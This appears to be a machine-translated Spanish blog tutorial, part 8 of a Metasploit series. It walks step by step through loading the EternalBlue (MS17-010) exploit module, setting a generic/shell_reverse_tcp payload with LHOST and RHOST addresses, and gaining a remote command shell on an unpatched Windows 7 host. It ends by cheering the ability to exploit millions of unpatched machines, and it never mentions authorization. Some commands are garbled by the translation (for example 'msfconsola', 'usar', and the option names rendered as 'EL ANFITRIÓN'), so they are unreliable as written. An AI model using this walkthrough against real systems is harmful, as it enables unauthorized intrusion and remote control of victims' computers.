Conceptos básicos de Metasploit, Parte 8: Explotación con EternalBlue

Conceptos básicos de Metasploit, Parte 8: Explotación con EternalBlue

¡Bienvenidos de nuevo, mis futuros hackers!

El marco de Metasploit se ha convertido en una herramienta de pentesting versátil, pero en esencia, es una herramienta de explotación. Hasta ahora, en esta serie sobre Metasploit, nos hemos familiarizado con los diversos aspectos de esta herramienta, pero ahora vamos a pasar a la mejor parte: ¡operar otro sistema!

En la parte 7 de esta serie., agregamos un mod. Muy a menudo se desarrollan nuevos módulos que no forman parte de la instalación base, ni actualizaciones (msfupdate). Este es el caso del exploit EternalBlue de la NSA (al menos en el momento de escribir este artículo). Cuando esto sucede, debemos agregar el módulo manualmente, como hicimos en la parte 7.

Ahora que tenemos EternalBlue en nuestro Metasploit Framework, podemos usarlo para explotar un sistema Windows 7 o Windows Server 2008. En este caso, tengo un sistema operativo Windows 7×64 sin parches (se estima que alrededor del 50% de todos los sistemas Windows 7 son todavía sin parchear) en el que probaré el exploit EternalBlue de la NSA.

¡hackeemos!

Índice
  1. Paso #1 Inicie Kali e inicie msfconsole
  2. Paso #2 Usa Eternal Blue
  3. Paso #3 Revisa "Información"
  4. Paso #4 Definir la carga útil
  5. Paso #5 Establecer opciones
  6. Paso #6 ¡Explotar!
  7. Conclusión

Paso #1 Inicie Kali e inicie msfconsole

El primer paso, como siempre, es ejecutar Kali e iniciar la consola Metasploit.

kali>msfconsola

Paso #2 Usa Eternal Blue

Una vez que tenga el indicador "msf>", estará listo para comenzar a minar su sistema de destino. Primero tenemos que cargar el Azul eterno explotar el módulo en la consola de Metasploit. Esto lo podemos hacer ingresando;

msf > usar exploit/windows/smb/ms17_010_eternalblue

Si ha cargado con éxito este módulo de la Parte 7 de esta serie, debería ver un mensaje como el de arriba. Si vuelve con "Error al cargar el módulo", no ha cargado correctamente el módulo EternalBlue. Regrese a la parte 7 y cargue el módulo EternalBlue.

Paso #3 Revisa "Información"

Cuando cargo un módulo por primera vez, lo primero que suelo hacer es comprobar su "información". Esto nos proporciona información que probablemente necesitaré para usar el módulo, así como información sobre cómo funciona el módulo.

msf > información

Como puede ver arriba, Metasploit nos brinda información básica (Nombre, Plataforma, Privilegio, Rango, etc.) sobre el módulo en la parte superior, algunas opciones en el medio (no se muestran) y una descripción del módulo en la parte inferior. abajo (abajo).

Paso #4 Definir la carga útil

msf > mostrar cargas útiles

Ahora que hemos cargado nuestro módulo y tenemos información básica sobre él, es hora de seleccionar una carga útil con la que trabajar. Para ver todas las cargas útiles que funcionarán con este módulo, puede ingresar;

Es importante tener en cuenta que el comando "mostrar cargas útiles" se ejecuta Después Seleccionar el exploit solo le mostrará las cargas útiles que funcionarán con ese exploit. si lo ejecutas Antes al seleccionar tu exploit te mostrará TODO cargas útiles

En este ejemplo usaré nuestro método probado genérico/shell_reverse_tcp payload, pero puede usar cualquiera de los otros que aparecen en su lista de payload. Si tenemos éxito con esta carga útil, nos proporcionará un shell de comandos de Windows en nuestro sistema de destino.

msf > establecer carga útil genérica/shell_reverse_tcp

Paso #5 Establecer opciones

El último paso antes de explotar es configurar nuestras opciones. Para ver qué opciones tenemos con esta combinación de explotación y carga útil, ingrese;

msf > mostrar opciones

Como puede ver, hay muchas opciones, pero las únicas opciones que debemos configurar son EL ANFITRIÓN (nuestra IP) y la ANFITRIÓN (la IP de destino).

msf> configurar LHOST 192.168.1.101

msf> establecer RHOST 192.168.1.103

Después de configurar estas opciones, verifiquemos las opciones nuevamente para asegurarnos de que todo se haya ingresado correctamente y todo lo que necesitamos esté configurado.

msf > mostrar opciones

Paso #6 ¡Explotar!

Todo parece estar en orden, así que todo lo que queda por hacer es explotar este sistema Windows 7!

msf > explotar

Como puede ver arriba, Metasploit y EternalBlue intentan explotar el protocolo SMB de Windows 7. En la parte inferior, puede ver que Metasploit informa que tuvimos éxito y recibimos un símbolo del sistema de Windows en el sistema de destino. ¡Golpear!

Para verificar que ahora estamos en el sistema Windows, escriba "dir" para ver si muestra los archivos y directorios de Windows.

Conclusión

El marco Metasploit es una herramienta esencial en la caja de herramientas de casi todos los hackers/pentester. En esencia, es un marco de explotación con exploits, payloads y módulos auxiliares para todo tipo de sistemas. ¡Cuando se agrega el exploit EternalBlue, ahora nos permite explotar los millones de sistemas Windows 7 y Windows 2008 sin parches en el planeta!

Si quieres conocer otros artículos parecidos a Conceptos básicos de Metasploit, Parte 8: Explotación con EternalBlue puedes visitar la categoría Tutoriales.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Subir

Esta página web utiliza cookies para analizar de forma anónima y estadística el uso que haces de la web, mejorar los contenidos y tu experiencia de navegación. Para más información accede a la Política de Cookies . Ver mas